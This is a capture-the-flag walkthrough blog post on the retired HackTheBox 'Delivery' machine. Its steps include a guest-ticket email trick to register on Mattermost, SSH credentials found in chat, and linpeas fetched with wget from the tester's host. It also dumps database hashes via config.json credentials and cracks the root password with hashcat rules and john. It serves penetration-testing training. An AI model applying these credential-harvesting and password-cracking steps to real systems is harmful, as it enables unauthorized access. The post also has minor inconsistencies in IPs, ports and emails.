Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all articles
Browse latest Browse all 1823

Delivery HackTheBox Walkthrough

$
0
0

Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Delivery,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. Delivery is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

  • Scanning

·         Nmap

  • Enumeration

·            Using /etc/hosts for custom domain

·            Browsing HTTP service

·            Enumerating email service

  • Exploitation

·            Extracting database credentials from mattermost  

·            Cracking Password using hashcat rule based attack

  • Privilege Escalation

·            Cracking the password using john the ripper

  • Capturing the flag

 

Walkthrough

Network Scanning

 

Let’s get started then!

To Attack any machine, we need the IP Address. Machine hosted on HackTheBox have a static IP Address.

IP Address assigned to delivery machine: 10.129.149.209

Let us scan the VM with the most popular port scanning tool, nmap to enumerate open ports on the machine

So we add

 

10.129.149.209 to /etc/hosts delivery.htb

 





nmap -p- -A delivery.htb

From the result below we found three working ports on the VM, port SSH(22), HTTP(80) and Unknown(8065).

Since  HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.                                                                              

 



 

By scrolling and clicking on contact us page we found a link which goes to http://delivery.htb:8805 and we also got a hint on the page that to access mattermost server we need @delivery.htb email address.

Since we have added the host, we can now see the website in the browser by visiting http://delivery.htb.

 





We clicked on helpdesk and found another link which is a subdomain for helpdesk. So, we add and update the host file /etc/hosts with helpdesk.delivery.htb

nano /etc/hosts

10.129.149.79 delivery.htb helpdesk.delivery.htb



Since we have added the subdomain, we do further enumeration by visiting the subdomain http://helpdesk.delivery.htb. Which is running a support ticket system web application powered by osticket.

 



According to the hint we got before on contact us page, a valid email should end with @delivery.htb domain to access the mattermost server. So, we try to open a ticket as a guest user.



So, it gave us a successful message that our ticket is created as a guest user and it also provided us an email (4319594@delivery.htb) on which replying directly will further update the ticket on customer portal.

So, let’s leverage this feature to gain access to mattermost service.



 

Based on the hint we got earlier, we need @delivery.htb email to access the mattermost server. So, let’s try to enumerate the mattermost which is running on port 8065.

Here we could see an option to create an account.

 


 

So, let’s sign up using the email from the support ticket, (4319594@delivery.htb) which we received when we opened a new ticket.

 


 

 

So, to get the confirmation email we need to access customer support portal, Let’s go back and use the check ticket option on helpdesk using the ticket id and email ignite@delivery.htb to get the ticket data we opened.

 




 

Here we can see a confirmation email from mattermost server.

 

 

We copy and paste into browser to activate the email and access mattermost server. Once verified we login and see if we can find something interesting here. 

 


 

On logging in there is a chance to join internal team, Once joined there are some chat with root user which has mentioned some SSH credentials in the chat.



 

There is also a message which says to stop “using common password variations because of how easily it can be exploited”. So, let’s first login to server to ssh with credentials.

Username: maildeliverer

Password: Youve_G0t_Mail!

ssh maildeliverer@10.129.149.209

Once connected we can see the user.txt flag but we are first focused on getting root flag

so, we immediately ran linpeas to find out some weaknesses in the server.

cd /tmp

wget 10.10.14.108:8080/linpeas.sh

chmod 777 linpeas.sh



 

Since user maildeliverer is a basic user with no sudo privileges, However, there is MySQL database running because ticketing system is storing ticket details and while looking at the files we found mattermost service having writeable access and stores its configurations in path /opt/mattermost/ config/config.json.

 



So, after opening the config.json file we found database credentials under SqlSettings.

cd /opt

ls

cd /mattermost

ls

cd config

cat config.json

 


 

The database credentials are:

Username: mmuser:

Password: Crack_The_MM_Admin_PW



 

We connect to the database with the credentials we have found in mattermost config.json using the command below.

 

mysql -h 127.0.0.1 -u'mmuser' -p


 

We check all the database available and here we only found default and mattermost database so we use mattermost database and check tables.

show database;

use mattermost;

show tables;

 



Since we found many tables, but we will go with user table which looks interesting so let’s check if we can find some root credentials.

Select Username, password from Users;

As we should only be interested in root user but the problem here is that the password is in hash.

Save the password in a file called hash.



Previously a hint was given in chat by root user that the password should be a variant of PleaseSubscribe! So, we created a custom wordlist instead on using rockyou.txt



 

We saved PleaseSubscribe! in a file, then created a custom variant using hashcat, there are many in /usr/share/hashcat/rules, so let’s start with the one called “best”.

nano file

cat file

hashcat -r /usr/share/hashcat/rules/best64.rule --stdout file > dict.txt

 



Once our dictionary is created, we can use it to crack the hash with john the ripper.

john –wordlist=/root/dict.txt hash

 


 

su root

PleaseSubscribe!21

cd /root

cat root.txt

 



Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles, Ignite technologies. Contact here.


Viewing all articles
Browse latest Browse all 1823

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>